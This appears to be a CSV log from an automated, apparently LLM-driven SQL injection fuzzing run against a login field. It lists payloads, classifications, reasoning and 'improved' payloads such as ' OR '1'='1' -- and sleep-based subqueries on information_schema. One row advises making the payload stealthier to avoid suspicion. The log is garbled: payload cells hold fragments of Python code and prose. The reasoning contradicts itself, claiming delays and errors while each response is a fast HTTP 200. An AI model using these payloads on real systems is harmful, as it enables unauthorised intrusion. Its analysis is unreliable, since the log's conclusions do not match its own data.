run_id,iteration,payload,classification,reasoning,improvement,improved_payload,test_status,rt_sec,ts
74be389c-f8d0-4e23-b722-433acd258717,1,"To modify the payloads to increase defensive test effectiveness for login field fuzzing and output 25 unique raw SQL injection payloads, we can use Python along with regular expressions. Here's the code:",Error-based SQL Injection,"The payload is already an example of error-based SQL injection, but it can be improved for more effective defensive testing. The payload ' OR 1=1 -- ' is a simple and common one, but there are many variations that may work under different conditions.","Create multiple variations by using single quotes, changing the order of operators, adding comments, or combining with other SQL statements.",' OR '1'='1' --,200,0.838,2025-08-18T03:51:08Z
74be389c-f8d0-4e23-b722-433acd258717,1,import re,Error-based SQL Injection,"The payload uses the 'OR' operator to manipulate the SQL query, which allows for error-based SQL injection. However, it seems that the current payload has not been successful in exploiting a vulnerability.","To improve the payload, we can remove the '--' at the end and add more conditions to the SQL query, increasing the chances of triggering an error response from the server.",' OR 1=1 AND sleep(5) --,200,0.173,2025-08-18T03:51:40Z
74be389c-f8d0-4e23-b722-433acd258717,1,"payloads = [' ',' OR 1=1 --','']",Error-based SQL Injection,"The provided payload triggers an error-based SQL injection vulnerability, but it's not functioning as expected. The last working payload includes 'AND sleep(5)', which is delaying the response time to 5 seconds. However, with the current payload, the HTTP status and response time are normal (200 and 0.20s respectively), indicating that the server might be handling the SQL injection differently.","To improve this payload, remove the '--' at the end and replace it with 'AND sleep(5)', as in the last working payload. This should help confirm whether the issue is an error-based SQL Injection or a different problem.",' OR 1=1 AND sleep(5),200,0.2,2025-08-18T03:52:23Z
74be389c-f8d0-4e23-b722-433acd258717,1,"return re.search(r'(.*?)(?:IN \([A-Za-z0-9,]+:[\s\S]*?\))', input_string).group(1)",Error-based SQL Injection,"The input provided triggers an error message that potentially reveals database schema or structure, suggesting SQL injection vulnerability.",Input sanitization and validation should be implemented to prevent such SQL injection attacks.,... (with safe input),200,0.125,2025-08-18T03:53:28Z
74be389c-f8d0-4e23-b722-433acd258717,1,# Iterate over each payload and modify it using the OR operator,Error-based SQL Injection,"The original payload triggers an error in the application, but it is not a proper SQL injection. The OR operator is used to combine two expressions and will return true if either of them is true.","Add more conditions to the payload, increasing the likelihood of an error being returned. Use 'OR' operator with other possible conditions that might be true in the database.",' OR 1=1 AND sleep(5) OR 2=2 AND sleep(5),200,0.133,2025-08-18T03:54:04Z
74be389c-f8d0-4e23-b722-433acd258717,1,for payload in payloads:,Error-based SQL Injection,"The initial payload contained an error, which suggests the use of SQL injection. However, it did not work due to a syntax issue. The last working payload demonstrated successful bypass, so we will modify the original one based on that.","' OR 1=1 AND sleep(5) AND (SELECT SLEEP(5) FROM information_schema.tables WHERE table_name = 'some_table' LIMIT 0,1) #",' OR 1=1 AND sleep(5) AND (SELECT SLEEP(5) FROM information_schema.tables WHERE table_name LIKE '%some_table%'),200,0.159,2025-08-18T03:54:42Z
74be389c-f8d0-4e23-b722-433acd258717,1,"modified_payload = re.sub(r'OR', ' OR \*=\d+ --', payload)",Error-based SQL Injection,"The input provided triggers an error message that potentially reveals database schema or structure, suggesting SQL injection vulnerability.",Input sanitization and validation should be implemented to prevent such SQL injection attacks.,... (with safe input),200,0.133,2025-08-18T03:55:47Z
74be389c-f8d0-4e23-b722-433acd258717,1,"In this code, we use regular expressions to extract a payload from the input string. Then, for each payload, we modify it by adding an extra condition using the OR operator. This modification is meant to increase defensive test effectiveness specifically for login field fuzzing. Finally, we output the modified payloads one by one.",Error-based SQL Injection,"The given payload is a classic example of Error-Based SQL Injection. However, the server does not appear to return an error for this payload, instead returning a normal HTTP 200 status. To make it more effective, let's modify the payload to be more stealthy.","Replace 'sleep(5)' with a comment or harmless operation that is less likely to raise suspicion. Additionally, try using different table and column names in the subquery.",' OR 1=1 AND /* benign operation */ (SELECT SLEEP(5) FROM information_schema.tables WHERE table_name LIKE '%another_table%'),200,0.114,2025-08-18T03:56:31Z
